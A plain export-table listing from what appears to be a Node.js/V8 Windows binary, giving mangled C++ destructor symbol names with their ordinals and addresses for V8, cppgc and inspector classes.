                                                                                                                                                                                                                                    ??1CodeEventHandler@v8@@UEAA@XZ12970x140c77750
                                                                                                                                                                                                                                    ??1CodeEventLogger@internal@v8@@UEAA@XZ12980x140a0e390
                                                                                                                                                                                                                                    ??1CodeGenerator@compiler@internal@v8@@UEAA@XZ12990x1405a6bc0
                                                                                                                                                                                                                                    ??1CodeMap@internal@v8@@QEAA@XZ13000x140865520
                                                                                                                                                                                                                                    ??1CodeObjectRegistry@internal@v8@@QEAA@XZ13010x140538860
                                                                                                                                                                                                                                    ??1CodeRange@internal@v8@@UEAA@XZ13020x140b48120
                                                                                                                                                                                                                                    ??1CodeSpaceWriteScope@wasm@internal@v8@@QEAA@XZ13030x1406d5830
                                                                                                                                                                                                                                    ??1CombinedHeapObjectIterator@internal@v8@@QEAA@XZ13040x1407ec170
                                                                                                                                                                                                                                    ??1CommandLineAPIScope@V8InspectorSession@v8_inspector@@UEAA@XZ13050x1400971a0
                                                                                                                                                                                                                                    ??1CommonEnvironmentSetup@node@@QEAA@XZ13060x1402a0770
                                                                                                                                                                                                                                    ??1CommonOperatorReducer@compiler@internal@v8@@UEAA@XZ13070x1400971a0
                                                                                                                                                                                                                                    ??1CompactionSpace@internal@v8@@UEAA@XZ13080x1405388d0
                                                                                                                                                                                                                                    ??1Compactor@internal@cppgc@@QEAA@XZ13090x14051af30
                                                                                                                                                                                                                                    ??1CompilationDependencies@compiler@internal@v8@@QEAA@XZ13100x141014730
                                                                                                                                                                                                                                    ??1CompilationEventCallback@wasm@internal@v8@@UEAA@XZ13110x1400971a0
                                                                                                                                                                                                                                    ??1CompilationHandleScope@internal@v8@@QEAA@XZ13120x140c00730
                                                                                                                                                                                                                                    ??1CompilationJob@internal@v8@@UEAA@XZ13130x1400971a0
                                                                                                                                                                                                                                    ??1CompilationResultResolver@wasm@internal@v8@@UEAA@XZ13140x1400971a0
                                                                                                                                                                                                                                    ??1CompilationState@wasm@internal@v8@@QEAA@XZ13150x14068c750
                                                                                                                                                                                                                                    ??1CompiledWasmModule@v8@@QEAA@XZ13160x140098490
                                                                                                                                                                                                                                    ??1ConcurrentMarker@internal@cppgc@@UEAA@XZ13170x140512620
                                                                                                                                                                                                                                    ??1ConcurrentMarkerBase@internal@cppgc@@UEAA@XZ13180x14051d9d0
                                                                                                                                                                                                                                    ??1ConcurrentMarking@internal@v8@@QEAA@XZ13190x140538970
                                                                                                                                                                                                                                    ??1ConcurrentMarkingVisitor@internal@cppgc@@UEAA@XZ13200x1400971a0
                                                                                                                                                                                                                                    ??1ConcurrentUnifiedHeapMarkingVisitor@internal@v8@@UEAA@XZ13210x140b3b380
                                                                                                                                                                                                                                    ??1ConditionVariable@base@v8@@QEAA@XZ13220x1400971a0
                                                                                                                                                                                                                                    ??1ConditionalControlFlowBuilder@interpreter@internal@v8@@UEAA@XZ13230x140a32c60
                                                                                                                                                                                                                                    ??1ConstantArrayBuilder@interpreter@internal@v8@@QEAA@XZ13240x14073e5c0
                                                                                                                                                                                                                                    ??1ConstantFoldingReducer@compiler@internal@v8@@UEAA@XZ13250x141128fb0
                                                                                                                                                                                                                                    ??1ConsumeCodeCacheTask@ScriptCompiler@v8@@QEAA@XZ13260x140c77770
                                                                                                                                                                                                                                    ??1ContextDeserializer@internal@v8@@UEAA@XZ13270x1407d1ae0
                                                                                                                                                                                                                                    ??1ContextSerializer@internal@v8@@UEAA@XZ13280x1407ec190
                                                                                                                                                                                                                                    ??1ControlEquivalence@compiler@internal@v8@@QEAA@XZ13290x1405736c0
                                                                                                                                                                                                                                    ??1ControlFlowBuilder@interpreter@internal@v8@@UEAA@XZ13300x1400971a0
                                                                                                                                                                                                                                    ??1ControlFlowOptimizer@compiler@internal@v8@@QEAA@XZ13310x141093c70
                                                                                                                                                                                                                                    ??1Coverage@debug@v8@@QEAA@XZ13320x14009b260
                                                                                                                                                                                                                                    ??1CppHeap@internal@v8@@UEAA@XZ13330x140b3e120
                                                                                                                                                                                                                                    ??1CppHeap@v8@@UEAA@XZ13340x1400971a0
                                                                                                                                                                                                                                    ??1CppHeapCreateParams@v8@@QEAA@XZ13350x140538a90
                                                                                                                                                                                                                                    ??1CpuFeatureScope@internal@v8@@QEAA@XZ13360x1400971a0
                                                                                                                                                                                                                                    ??1CpuProfileDeoptInfo@v8@@QEAA@XZ13370x140098770
                                                                                                                                                                                                                                    ??1CpuProfiler@internal@v8@@QEAA@XZ13380x14087a670
                                                                                                                                                                                                                                    ??1CpuProfilesCollection@internal@v8@@QEAA@XZ13390x14085c980
                                                                                                                                                                                                                                    ??1CpuProfilingOptions@v8@@QEAA@XZ13400x1400989d0
                                                                                                                                                                                                                                    ??1CreateParams@Isolate@v8@@QEAA@XZ13410x140c777a0
                                                                                                                                                                                                                                    ??1CrossThreadPersistentRegion@internal@cppgc@@QEAA@XZ13420x14050c050
                                                                                                                                                                                                                                    ??1CsaLoadElimination@compiler@internal@v8@@UEAA@XZ13430x141093ca0
                                                                                                                                                                                                                                    ??1DateCache@internal@v8@@UEAA@XZ13440x140817e00
                                                                                                                                                                                                                                    ??1DbgStreamBuf@internal@v8@@UEAA@XZ13450x1407bacc0
                                                                                                                                                                                                                                    ??1DeadCodeElimination@compiler@internal@v8@@UEAA@XZ13460x1400971a0
                                                                                                                                                                                                                                    ??1Debug@internal@v8@@AEAA@XZ13470x140bb6ed0
                                                                                                                                                                                                                                    ??1DebugInfo@wasm@internal@v8@@QEAA@XZ13480x140655a40
                                                                                                                                                                                                                                    ??1DeclarationScope@internal@v8@@QEAA@XZ13490x1400971a0
                                                                                                                                                                                                                                    ??1DecompressionOptimizer@compiler@internal@v8@@QEAA@XZ13500x141093cd0
                                                                                                                                                                                                                                    ??1DefaultEmbedderRootsHandler@internal@v8@@UEAA@XZ13510x1400971a0
                                                                                                                                                                                                                                    ??1Delegate@ValueDeserializer@v8@@UEAA@XZ13520x1400971a0
                                                                                                                                                                                                                                    ??1Delegate@ValueSerializer@v8@@UEAA@XZ13530x1400971a0
                                                                                                                                                                                                                                    ??1DisallowCompilation@internal@v8@@QEAA@XZ13540x140bda940
                                                                                                                                                                                                                                    ??1DisallowDeoptimization@internal@v8@@QEAA@XZ13550x140bda950
                                                                                                                                                                                                                                    ??1DisallowExceptions@internal@v8@@QEAA@XZ13560x140bda960
                                                                                                                                                                                                                                    ??1DisallowGarbageCollectionScope@subtle@cppgc@@QEAA@XZ13570x14051ab30
                                                                                                                                                                                                                                    ??1DisallowJavascriptExecution@internal@v8@@QEAA@XZ13580x140bda970
                                                                                                                                                                                                                                    ??1DisallowJavascriptExecutionScope@Isolate@v8@@QEAA@XZ13590x140c777f0
                                                                                                                                                                                                                                    ??1DiscardedSamplesDelegate@v8@@UEAA@XZ13600x1400971a0
                                                                                                                                                                                                                                    ??1DisjointAllocationPool@wasm@internal@v8@@QEAA@XZ13610x140538aa0
                                                                                                                                                                                                                                    ??1Domain@API@Schema@protocol@v8_inspector@@UEAA@XZ13620x1404e4100
                                                                                                                                                                                                                                    ??1DumpOnJavascriptExecution@internal@v8@@QEAA@XZ13630x140bda980
                                                                                                                                                                                                                                    ??1EhFrameWriter@internal@v8@@QEAA@XZ13640x1405736c0
                                                                                                                                                                                                                                    ??1EmbedderGraph@v8@@UEAA@XZ13650x1400971a0
                                                                                                                                                                                                                                    ??1EmbedderHeapTracer@v8@@UEAA@XZ13660x1400971a0
                                                                                                                                                                                                                                    ??1EmbedderRootsHandler@v8@@UEAA@XZ13670x1400971a0
                                                                                                                                                                                                                                    ??1EmbedderStackStateScope@internal@v8@@QEAA@XZ13680x140afd750
                                                                                                                                                                                                                                    ??1EmbedderState@internal@v8@@QEAA@XZ13690x140b81d30
                                                                                                                                                                                                                                    ??1EmbedderStateScope@v8@@QEAA@XZ13700x140c77850
                                                                                                                                                                                                                                    ??1Entry@TypeProfile@debug@v8@@QEAA@XZ13710x1405387f0
                                                                                                                                                                                                                                    ??1ErrorThrower@wasm@internal@v8@@QEAA@XZ13720x14061fd30
                                                                                                                                                                                                                                    ??1EscapableHandleScope@v8@@QEAA@XZ13730x1400972a0
                                                                                                                                                                                                                                    ??1EscapeAnalysis@compiler@internal@v8@@QEAA@XZ13740x141093d20
                                                                                                                                                                                                                                    ??1EscapeAnalysisReducer@compiler@internal@v8@@UEAA@XZ13750x141093e30
                                                                                                                                                                                                                                    ??1Exported@protocol@v8_inspector@@UEAA@XZ13760x1404e4100
                                                                                                                                                                                                                                    ??1Extension@v8@@UEAA@XZ13770x140097b40
                                                                                                                                                                                                                                    ??1ExternalMarkingWorklist@MarkingWorklists@internal@cppgc@@QEAA@XZ13780x14050eba0
                                                                                                                                                                                                                                    ??1ExternalOneByteStringResource@String@v8@@UEAA@XZ13790x1400971a0
                                                                                                                                                                                                                                    ??1ExternalResourceVisitor@v8@@UEAA@XZ13800x1400971a0
                                                                                                                                                                                                                                    ??1ExternalSourceStream@ScriptCompiler@v8@@UEAA@XZ13810x1400971a0
                                                                                                                                                                                                                                    ??1ExternalStringResource@String@v8@@UEAA@XZ13820x1400971a0
                                                                                                                                                                                                                                    ??1ExternalStringResourceBase@String@v8@@UEAA@XZ13830x1400971a0
                                                                                                                                                                                                                                    ??1FeedbackVectorSpec@internal@v8@@QEAA@XZ13840x140538b00
                                                                                                                                                                                                                                    ??1FlatStringReader@internal@v8@@UEAA@XZ13850x140538b20
                                                                                                                                                                                                                                    ??1FrameSummary@internal@v8@@QEAA@XZ13860x140b7a040
                                                                                                                                                                                                                                    ??1FreeListMany@internal@v8@@UEAA@XZ13870x140b1eb00
                                                                                                                                                                                                                                    ??1FreeListManyCached@internal@v8@@UEAA@XZ13880x140538b40
                                                                                                                                                                                                                                    ??1FreeListManyCachedFastPath@internal@v8@@UEAA@XZ13890x140538b40
                                                                                                                                                                                                                                    ??1FreeListManyCachedOrigin@internal@v8@@UEAA@XZ13900x140538b40
                                                                                                                                                                                                                                    ??1FunctionData@Coverage@debug@v8@@QEAA@XZ13910x1405387f0
                                                                                                                                                                                                                                    ??1GCInfoTable@internal@cppgc@@QEAA@XZ13920x14051c350
                                                                                                                                                                                                                                    ??1GCInvoker@internal@cppgc@@QEAA@XZ13930x14051b9e0
                                                                                                                                                                                                                                    ??1GCTracer@internal@v8@@QEAA@XZ13940x140a97d90
                                                                                                                                                                                                                                    ??1GlobalHandles@internal@v8@@QEAA@XZ13950x140b4bea0
                                                                                                                                                                                                                                    ??1GlobalSafepointScope@internal@v8@@QEAA@XZ13960x140aa8b80
                                                                                                                                                                                                                                    ??1Graph@compiler@internal@v8@@QEAA@XZ13970x14102d5b0
                                                                                                                                                                                                                                    ??1GraphAssembler@compiler@internal@v8@@UEAA@XZ13980x1410e1250
                                                                                                                                                                                                                                    ??1GraphReducer@compiler@internal@v8@@UEAA@XZ13990x1410c8410
                                                                                                                                                                                                                                    ??1GraphTrimmer@compiler@internal@v8@@QEAA@XZ14000x14057e2a0
                                                                                                                                                                                                                                    ??1HandleScope@v8@@QEAA@XZ14010x140c77880
                                                                                                                                                                                                                                    ??1HandlerTableBuilder@interpreter@internal@v8@@QEAA@XZ14020x140538b00
                                                                                                                                                                                                                                    ??1Heap@cppgc@@UEAA@XZ14030x1400971a0
                                                                                                                                                                                                                                    ??1Heap@internal@cppgc@@UEAA@XZ14040x1405175f0
                                                                                                                                                                                                                                    ??1HeapBase@internal@cppgc@@UEAA@XZ14050x14051afe0
                                                                                                                                                                                                                                    ??1HeapGrowing@internal@cppgc@@QEAA@XZ14060x14051a850
                                                                                                                                                                                                                                    ??1HeapObjectIterator@internal@v8@@QEAA@XZ14070x140afdc20
                                                                                                                                                                                                                                    ??1IdentityMapBase@internal@v8@@MEAA@XZ14080x1407bb550
                                                                                                                                                                                                                                    ??1IncrementalMarking@internal@v8@@QEAA@XZ14090x140538b50
                                                                                                                                                                                                                                    ??1IndexGenerator@internal@v8@@QEAA@XZ14100x140aa2d40
                                                                                                                                                                                                                                    ??1Inspectable@V8InspectorSession@v8_inspector@@UEAA@XZ14110x1400971a0
                                                                                                                                                                                                                                    ??1InstantiationResultResolver@wasm@internal@v8@@UEAA@XZ14120x1400971a0
                                                                                                                                                                                                                                    ??1InstructionBlock@compiler@internal@v8@@QEAA@XZ14130x14057e050
                                                                                                                                                                                                                                    ??1InstructionSelector@compiler@internal@v8@@QEAA@XZ14140x140584740
                                                                                                                                                                                                                                    ??1InstructionSequence@compiler@internal@v8@@QEAA@XZ14150x14057e090
                                                                                                                                                                                                                                    ??1Int64Lowering@compiler@internal@v8@@QEAA@XZ14160x141071370
                                                                                                                                                                                                                                    ??1Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@XZ14170x140538ca0
                                                                                                                                                                                                                                    ??1InvalidatedSlotsCleanup@internal@v8@@QEAA@XZ14180x140538c20
                                                                                                                                                                                                                                    ??1InvalidatedSlotsFilter@internal@v8@@QEAA@XZ14190x140538c30
                                                                                                                                                                                                                                    ??1Isolate@internal@v8@@AEAA@XZ14200x140b62f30
                                                                                                                                                                                                                                    ??1IsolateAllocator@internal@v8@@QEAA@XZ14210x140a64a60
                                                                                                                                                                                                                                    ??1JSCallReducer@compiler@internal@v8@@UEAA@XZ14220x141093e90
                                                                                                                                                                                                                                    ??1JSContextSpecialization@compiler@internal@v8@@UEAA@XZ14230x1400971a0
                                                                                                                                                                                                                                    ??1JSCreateLowering@compiler@internal@v8@@UEAA@XZ14240x1400971a0
                                                                                                                                                                                                                                    ??1JSGraph@compiler@internal@v8@@QEAA@XZ14250x14105b520
                                                                                                                                                                                                                                    ??1JSGraphAssembler@compiler@internal@v8@@UEAA@XZ14260x141071400
                                                                                                                                                                                                                                    ??1JSHeapBroker@compiler@internal@v8@@QEAA@XZ14270x1410b67b0
                                                                                                                                                                                                                                    ??1JSIntrinsicLowering@compiler@internal@v8@@UEAA@XZ14280x1400971a0
                                                                                                                                                                                                                                    ??1JSNativeContextSpecialization@compiler@internal@v8@@UEAA@XZ14290x1400971a0
                                                                                                                                                                                                                                    ??1JSToWasmWrapperCompilationUnit@wasm@internal@v8@@QEAA@XZ14300x1406bbf20
                                                                                                                                                                                                                                    ??1JSTypedLowering@compiler@internal@v8@@UEAA@XZ14310x1400971a0
                                                                                                                                                                                                                                    ??1JumpTableAssembler@wasm@internal@v8@@UEAA@XZ14320x1405593f0
                                                                                                                                                                                                                                    ??1LargeObjectSpace@internal@v8@@UEAA@XZ14330x140538c40
                                                                                                                                                                                                                                    ??1LargePage@internal@cppgc@@AEAA@XZ14340x1400971a0
                                                                                                                                                                                                                                    ??1LargePageMemoryRegion@internal@cppgc@@UEAA@XZ14350x14050d020
                                                                                                                                                                                                                                    ??1LargePageSpace@internal@cppgc@@UEAA@XZ14360x14050afb0
                                                                                                                                                                                                                                    ??1LazilyGeneratedNames@wasm@internal@v8@@QEAA@XZ14370x140538c80
                                                                                                                                                                                                                                    ??1LazyCompileDispatcher@internal@v8@@QEAA@XZ14380x140bd8980
                                                                                                                                                                                                                                    ??1LoadElimination@compiler@internal@v8@@UEAA@XZ14390x14057e2a0
                                                                                                                                                                                                                                    ??1Local@MarkingWorklists@internal@v8@@QEAA@XZ14400x140abead0
                                                                                                                                                                                                                                    ??1LocalDeclEncoder@wasm@internal@v8@@QEAA@XZ14410x140538e50
                                                                                                                                                                                                                                    ??1LocalEmbedderHeapTracer@internal@v8@@QEAA@XZ14420x140a97e70
                                                                                                                                                                                                                                    ??1LocalHeap@internal@v8@@QEAA@XZ14430x140af18e0
                                                                                                                                                                                                                                    ??1LocalIsolate@internal@v8@@QEAA@XZ14440x140b5ff20
                                                                                                                                                                                                                                    ??1Locker@v8@@QEAA@XZ14450x140b56c10
                                                                                                                                                                                                                                    ??1LoopBuilder@interpreter@internal@v8@@UEAA@XZ14460x140a32d00
                                                                                                                                                                                                                                    ??1LoopInfo@compiler@internal@v8@@QEAA@XZ14470x1405736c0
                                                                                                                                                                                                                                    ??1MachineGraph@compiler@internal@v8@@QEAA@XZ14480x14105b520
                                                                                                                                                                                                                                    ??1MachineOperatorReducer@compiler@internal@v8@@UEAA@XZ14490x1411cabb0
                                                                                                                                                                                                                                    ??1MacroAssembler@internal@v8@@UEAA@XZ14500x1405593f0
                                                                                                                                                                                                                                    ??1Marker@internal@cppgc@@UEAA@XZ14510x1405129f0
                                                                                                                                                                                                                                    ??1MarkerBase@internal@cppgc@@UEAA@XZ14520x140512a00
                                                                                                                                                                                                                                    ??1MarkingVerifier@internal@cppgc@@UEAA@XZ14530x14050fec0
                                                                                                                                                                                                                                    ??1MarkingVerifierBase@internal@cppgc@@UEAA@XZ14540x14050fec0
                                                                                                                                                                                                                                    ??1MarkingVisitorBase@internal@cppgc@@UEAA@XZ14550x1400971a0
                                                                                                                                                                                                                                    ??1MarkingWorklists@internal@v8@@QEAA@XZ14560x140abeb10
                                                                                                                                                                                                                                    ??1MeasureMemoryDelegate@internal@v8@@UEAA@XZ14570x140ab98c0
                                                                                                                                                                                                                                    ??1MeasureMemoryDelegate@v8@@UEAA@XZ14580x1400971a0
                                                                                                                                                                                                                                    ??1MemoryMappedFile@OS@base@v8@@UEAA@XZ14590x1400971a0
                                                                                                                                                                                                                                    ??1MemoryReducer@internal@v8@@QEAA@XZ14600x1405387f0
                                                                                                                                                                                                                                    ??1MicrotaskQueue@internal@v8@@UEAA@XZ14610x140b59d80
                                                                                                                                                                                                                                    ??1MicrotaskQueue@v8@@UEAA@XZ14620x1400971a0
                                                                                                                                                                                                                                    ??1MicrotasksScope@v8@@QEAA@XZ14630x140c778c0
                                                                                                                                                                                                                                    ??1MoveOptimizer@compiler@internal@v8@@QEAA@XZ14640x141093ec0
                                                                                                                                                                                                                                    ??1MultiIsolatePlatform@node@@UEAA@XZ14650x1400971a0
                                                                                                                                                                                                                                    ??1MutatorMarkingVisitor@internal@cppgc@@UEAA@XZ14660x1400971a0
                                                                                                                                                                                                                                    ??1MutatorMinorGCMarkingVisitor@internal@v8@@UEAA@XZ14670x1400971a0
                                                                                                                                                                                                                                    ??1MutatorUnifiedHeapMarkingVisitor@internal@v8@@UEAA@XZ14680x1400971a0
                                                                                                                                                                                                                                    ??1Mutex@base@v8@@QEAA@XZ14690x1400971a0
                                                                                                                                                                                                                                    ??1NameConverter@disasm@@UEAA@XZ14700x1400971a0
                                                                                                                                                                                                                                    ??1NameProvider@cppgc@@UEAA@XZ14710x1400971a0
                                                                                                                                                                                                                                    ??1NativeContextStats@internal@v8@@QEAA@XZ14720x140538ca0
                                                                                                                                                                                                                                    ??1NativeModule@wasm@internal@v8@@QEAA@XZ14730x14065d3a0
                                                                                                                                                                                                                                    ??1NativeModuleDeserializer@wasm@internal@v8@@QEAA@XZ14740x14061cc80
                                                                                                                                                                                                                                    ??1NewSpace@internal@v8@@UEAA@XZ14750x140ab72a0
                                                                                                                                                                                                                                    ??1NoDumpOnJavascriptExecution@internal@v8@@QEAA@XZ14760x140bda980
                                                                                                                                                                                                                                    ??1NoGarbageCollectionScope@subtle@cppgc@@QEAA@XZ14770x14051ab50
                                                                                                                                                                                                                                    ??1NoThrowOnJavascriptExecution@internal@v8@@QEAA@XZ14780x140bda990
                                                                                                                                                                                                                                    ??1NodeOriginTable@compiler@internal@v8@@QEAA@XZ14790x141071410
                                                                                                                                                                                                                                    ??1NormalPage@internal@cppgc@@AEAA@XZ14800x1400971a0
                                                                                                                                                                                                                                    ??1NormalPageMemoryPool@internal@cppgc@@QEAA@XZ14810x14050d050
                                                                                                                                                                                                                                    ??1NormalPageMemoryRegion@internal@cppgc@@UEAA@XZ14820x14050d020
                                                                                                                                                                                                                                    ??1NormalPageSpace@internal@cppgc@@UEAA@XZ14830x14050afb0
                                                                                                                                                                                                                                    ??1OFStream@internal@v8@@UEAA@XZ14840x140538cb0
                                                                                                                                                                                                                                    ??1OFStreamBase@internal@v8@@UEAA@XZ14850x140101c40
                                                                                                                                                                                                                                    ??1ObjectIterator@internal@v8@@UEAA@XZ14860x1400971a0
                                                                                                                                                                                                                                    ??1OldToNewRememberedSet@internal@cppgc@@QEAA@XZ14870x14050a260
                                                                                                                                                                                                                                    ??1OperationsBarrier@internal@v8@@QEAA@XZ14880x140538d40
                                                                                                                                                                                                                                    ??1Operator@compiler@internal@v8@@UEAA@XZ14890x1400971a0
                                                                                                                                                                                                                                    ??1OptimizedCompilationInfo@internal@v8@@QEAA@XZ14900x140be0540
                                                                                                                                                                                                                                    ??1OptimizingCompileDispatcher@internal@v8@@QEAA@XZ14910x140bd7cb0
                                                                                                                                                                                                                                    ??1OutputStream@v8@@UEAA@XZ14920x1400971a0
                                                                                                                                                                                                                                    ??1OverrideEmbedderStackStateScope@testing@cppgc@@QEAA@XZ14930x140504ec0
                                                                                                                                                                                                                                    ??1PageAllocator@base@v8@@UEAA@XZ14940x1400971a0
                                                                                                                                                                                                                                    ??1PageBackend@internal@cppgc@@QEAA@XZ14950x14050d0e0
                                                                                                                                                                                                                                    ??1PageMemoryRegion@internal@cppgc@@UEAA@XZ14960x14050d020
                                                                                                                                                                                                                                    ??1PageMemoryRegionTree@internal@cppgc@@QEAA@XZ14970x14050d130
                                                                                                                                                                                                                                    ??1PagedSpace@internal@v8@@UEAA@XZ14980x140538d60
                                                                                                                                                                                                                                    ??1PagedSpaceObjectIterator@internal@v8@@UEAA@XZ14990x1400971a0
                                                                                                                                                                                                                                    ??1ParallelMove@compiler@internal@v8@@QEAA@XZ15000x140538b00
                                                                                                                                                                                                                                    ??1ParseInfo@internal@v8@@QEAA@XZ15010x1408c88b0
                                                                                                                                                                                                                                    ??1Parser@internal@v8@@QEAA@XZ15020x14088cf30
                                                                                                                                                                                                                                    ??1PauseAllocationObserversScope@internal@v8@@QEAA@XZ15030x140b4a100
                                                                                                                                                                                                                                    ??1PersistentHandleVisitor@v8@@UEAA@XZ15040x1400971a0
                                                                                                                                                                                                                                    ??1PersistentHandles@internal@v8@@QEAA@XZ15050x140b4a770
                                                                                                                                                                                                                                    ??1PersistentHandlesScope@internal@v8@@QEAA@XZ15060x140b4a840
                                                                                                                                                                                                                                    ??1PersistentRegion@internal@cppgc@@QEAA@XZ15070x14051b130
                                                                                                                                                                                                                                    ??1PersistentRegionBase@internal@cppgc@@QEAA@XZ15080x14050c190
                                                                                                                                                                                                                                    ??1PersistentRegionLock@internal@cppgc@@QEAA@XZ15090x14050c1b0
                                                                                                                                                                                                                                    ??1PhiInstruction@compiler@internal@v8@@QEAA@XZ15100x14057e2a0
                                                                                                                                                                                                                                    ??1Platform@cppgc@@UEAA@XZ15110x1400971a0
                                                                                                                                                                                                                                    ??1PreparseDataBuilder@internal@v8@@QEAA@XZ15120x1400971a0
                                                                                                                                                                                                                                    ??1ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAA@XZ15130x140b3a830
                                                                                                                                                                                                                                    ??1ProfileNode@internal@v8@@QEAA@XZ15140x140865580
                                                                                                                                                                                                                                    ??1ProfileTree@internal@v8@@QEAA@XZ15150x140865620
                                                                                                                                                                                                                                    ??1ProfilerCodeObserver@internal@v8@@UEAA@XZ15160x14085d060
                                                                                                                                                                                                                                    ??1ProfilerEventsProcessor@internal@v8@@UEAA@XZ15170x14087a8e0
                                                                                                                                                                                                                                    ??1ProfilerListener@internal@v8@@UEAA@XZ15180x1408620d0
                                                                                                                                                                                                                                    ??1PropertyDescriptor@v8@@QEAA@XZ15190x140c77910
                                                                                                                                                                                                                                    ??1PropertyIterator@debug@v8@@UEAA@XZ15200x1400971a0
                                                                                                                                                                                                                                    ??1RawHeap@internal@cppgc@@QEAA@XZ15210x14050afc0
                                                                                                                                                                                                                                    ??1RawMachineAssembler@compiler@internal@v8@@QEAA@XZ15220x1410a5fe0
                                                                                                                                                                                                                                    ??1RawMachineLabel@compiler@internal@v8@@QEAA@XZ15230x1400971a0
                                                                                                                                                                                                                                    ??1ReadOnlySerializer@internal@v8@@UEAA@XZ15240x1407deb60
                                                                                                                                                                                                                                    ??1ReadOnlySpace@internal@v8@@UEAA@XZ15250x140aa9dd0
                                                                                                                                                                                                                                    ??1Recorder@metrics@v8@@UEAA@XZ15260x1400971a0
                                                                                                                                                                                                                                    ??1RecursiveMutex@base@v8@@QEAA@XZ15270x1402c2600
                                                                                                                                                                                                                                    ??1Reducer@compiler@internal@v8@@UEAA@XZ15280x1400971a0
                                                                                                                                                                                                                                    ??1RedundancyElimination@compiler@internal@v8@@UEAA@XZ15290x1411d3f80
                                                                                                                                                                                                                                    ??1RegExpBytecodeGenerator@internal@v8@@UEAA@XZ15300x1408539d0
                                                                                                                                                                                                                                    ??1RegExpMacroAssemblerX64@internal@v8@@UEAA@XZ15310x14056dcf0
                                                                                                                                                                                                                                    ??1RegionAllocator@base@v8@@QEAA@XZ15320x1410004c0
                                                                                                                                                                                                                                    ??1RegisterConfiguration@internal@v8@@UEAA@XZ15330x1400971a0
                                                                                                                                                                                                                                    ??1RegisterState@v8@@QEAA@XZ15340x140c77920
                                                                                                                                                                                                                                    ??1RemoteObject@API@Runtime@protocol@v8_inspector@@UEAA@XZ15350x1404e4100
                                                                                                                                                                                                                                    ??1ReusableUnoptimizedCompileState@internal@v8@@QEAA@XZ15360x1408c8900
                                                                                                                                                                                                                                    ??1SafeForTerminationScope@Isolate@v8@@QEAA@XZ15370x140c77940
                                                                                                                                                                                                                                    ??1SafepointScope@internal@v8@@QEAA@XZ15380x140aa8c90
                                                                                                                                                                                                                                    ??1Sampler@sampler@v8@@UEAA@XZ15390x140a1f9c0
                                                                                                                                                                                                                                    ??1SamplingEventsProcessor@internal@v8@@UEAA@XZ15400x14087a9b0
                                                                                                                                                                                                                                    ??1SaveAndSwitchContext@internal@v8@@QEAA@XZ15410x140538da0
                                                                                                                                                                                                                                    ??1SaveContext@internal@v8@@QEAA@XZ15420x140b63950
                                                                                                                                                                                                                                    ??1Scanner@internal@v8@@QEAA@XZ15430x140538db0
                                                                                                                                                                                                                                    ??1Schedule@compiler@internal@v8@@QEAA@XZ15440x1405848a0
                                                                                                                                                                                                                                    ??1ScheduledErrorThrower@wasm@internal@v8@@QEAA@XZ15450x14061fde0
                                                                                                                                                                                                                                    ??1Scheduler@compiler@internal@v8@@QEAA@XZ15460x141094130
                                                                                                                                                                                                                                    ??1Scope@GCTracer@internal@v8@@QEAA@XZ15470x140a97eb0
                                                                                                                                                                                                                                    ??1Scope@Isolate@v8@@QEAA@XZ15480x140098110
                                                                                                                                                                                                                                    ??1Scope@internal@v8@@QEAA@XZ15490x1400971a0
                                                                                                                                                                                                                                    ??1ScopeIterator@debug@v8@@UEAA@XZ15500x1400971a0
                                                                                                                                                                                                                                    ??1ScopedExceptionHandler@compiler@internal@v8@@QEAA@XZ15510x1410a6010
                                                                                                                                                                                                                                    ??1ScriptData@Coverage@debug@v8@@QEAA@XZ15520x1405387f0
                                                                                                                                                                                                                                    ??1ScriptData@TypeProfile@debug@v8@@QEAA@XZ15530x1405387f0
                                                                                                                                                                                                                                    ??1SealHandleScope@v8@@QEAA@XZ15540x140c77950
                                                                                                                                                                                                                                    ??1SearchMatch@API@Debugger@protocol@v8_inspector@@UEAA@XZ15550x1404e4100
                                                                                                                                                                                                                                    ??1Semaphore@base@v8@@QEAA@XZ15560x140ffb510
                                                                                                                                                                                                                                    ??1SetupIsolateDelegate@internal@v8@@UEAA@XZ15570x1400971a0
                                                                                                                                                                                                                                    ??1SharedHeapSerializer@internal@v8@@UEAA@XZ15580x1407d50c0
                                                                                                                                                                                                                                    ??1SharedMutex@base@v8@@QEAA@XZ15590x1400971a0
                                                                                                                                                                                                                                    ??1SharedTurboAssembler@internal@v8@@UEAA@XZ15600x1405593f0
                                                                                                                                                                                                                                    ??1SignatureMap@wasm@internal@v8@@QEAA@XZ15610x140538e40
                                                                                                                                                                                                                                    ??1SimplifiedOperatorReducer@compiler@internal@v8@@UEAA@XZ15620x1411fb800
                                                                                                                                                                                                                                    ??1SnapshotCreator@v8@@QEAA@XZ15630x140c77970
                                                                                                                                                                                                                                    ??1SnapshotData@internal@v8@@UEAA@XZ15640x14061cd30
                                                                                                                                                                                                                                    ??1SourceIdAssigner@compiler@internal@v8@@QEAA@XZ15650x141071430
                                                                                                                                                                                                                                    ??1SourcePositionTable@compiler@internal@v8@@QEAA@XZ15660x14102d5b0
                                                                                                                                                                                                                                    ??1SourcePositionTable@internal@v8@@QEAA@XZ15670x14085c9c0
                                                                                                                                                                                                                                    ??1SourcePositionTableBuilder@internal@v8@@QEAA@XZ15680x140538e50
                                                                                                                                                                                                                                    ??1Space@internal@v8@@UEAA@XZ15690x140538e70
                                                                                                                                                                                                                                    ??1SpaceIterator@internal@v8@@UEAA@XZ15700x140afdc90
                                                                                                                                                                                                                                    ??1StackTrace@API@Runtime@protocol@v8_inspector@@UEAA@XZ15710x1404e4100
                                                                                                                                                                                                                                    ??1StackTrace@debug@base@v8@@QEAA@XZ15720x1400971a0
                                                                                                                                                                                                                                    ??1StackTraceFrameIterator@internal@v8@@QEAA@XZ15730x1400971a0
                                                                                                                                                                                                                                    ??1StackTraceId@API@Runtime@protocol@v8_inspector@@UEAA@XZ15740x1404e4100
                                                                                                                                                                                                                                    ??1StackTraceIterator@debug@v8@@UEAA@XZ15750x1400971a0
                                                                                                                                                                                                                                    ??1StartupSerializer@internal@v8@@UEAA@XZ15760x1407d0530
                                                                                                                                                                                                                                    ??1StateValuesCache@compiler@internal@v8@@QEAA@XZ15770x14105b530
                                                                                                                                                                                                                                    ??1StatsCollector@internal@cppgc@@QEAA@XZ15780x14051b140
                                                                                                                                                                                                                                    ??1StatsScope@ZoneStats@compiler@internal@v8@@QEAA@XZ15790x1411d2e60
                                                                                                                                                                                                                                    ??1StreamedSource@ScriptCompiler@v8@@QEAA@XZ15800x140c77a00
